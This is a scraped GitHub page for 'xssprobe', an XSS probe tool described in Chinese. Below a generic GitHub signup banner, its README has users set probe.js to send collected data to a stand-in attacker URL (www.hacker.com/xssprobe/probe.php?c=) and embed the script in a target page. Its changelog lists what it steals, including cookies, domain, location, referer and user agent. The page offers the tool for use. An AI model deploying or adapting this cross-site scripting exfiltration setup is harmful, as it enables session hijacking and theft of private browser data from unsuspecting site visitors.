Join GitHub today
GitHub is home to over 50 million developers working together to host and review code, manage projects, and build software together.
Sign upGitHub is where the world builds software
Millions of developers and companies build, ship, and maintain their software on GitHub — the largest and most advanced development platform in the world.
README
xssprobe xss探针脚本,用于获取被跨页面的通用数据。 使用说明: 1、修改probe.js: // 获取隐私信息的服务端页面,这里需配置为自己的probe.php网址 http_server = "http://www.hacker.com/xssprobe/probe.php?c="; 2、在目标页面嵌入probe.js文件,可以参考demo.html(xssprobe demo page):) by evilcos@gmail.com ChangeLog ===================================== 2011/8/22 v1 能获取的数据如下: browser, ua, lang, referer, location, toplocation, cookie, domain, title, screen, flash